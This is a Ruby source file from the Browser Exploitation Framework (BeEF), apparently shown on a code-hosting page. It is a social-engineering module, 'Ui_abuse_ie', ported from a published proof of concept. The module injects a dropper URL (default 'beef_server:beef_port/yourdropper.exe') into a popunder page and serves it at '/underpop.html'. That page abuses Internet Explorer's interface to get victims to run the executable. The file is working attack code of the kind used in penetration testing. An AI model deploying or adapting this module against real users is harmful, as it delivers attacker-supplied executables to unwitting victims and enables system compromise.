36 lines
1.3 KiB
Ruby
36 lines
1.3 KiB
Ruby
#
|
|
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
################################################################################
|
|
# Based on the PoC by Rosario Valotta
|
|
# Ported to BeEF by antisnatchor
|
|
# For more information see: https://sites.google.com/site/tentacoloviola/
|
|
################################################################################
|
|
class Ui_abuse_ie < BeEF::Core::Command
|
|
def self.options
|
|
[
|
|
{ 'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe' }
|
|
]
|
|
end
|
|
|
|
def pre_send
|
|
@datastore.each do |input|
|
|
@exe_url = input['value'] if input['name'] == 'exe_url'
|
|
end
|
|
|
|
popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html")
|
|
body = popunder.gsub('__URL_PLACEHOLDER__', @exe_url)
|
|
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', { 'Content-Type' => 'text/html' }, body, '/underpop.html', -1)
|
|
rescue StandardError => e
|
|
print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}"
|
|
end
|
|
|
|
def post_execute
|
|
content = {}
|
|
content['results'] = @datastore['results']
|
|
save content
|
|
end
|
|
end
|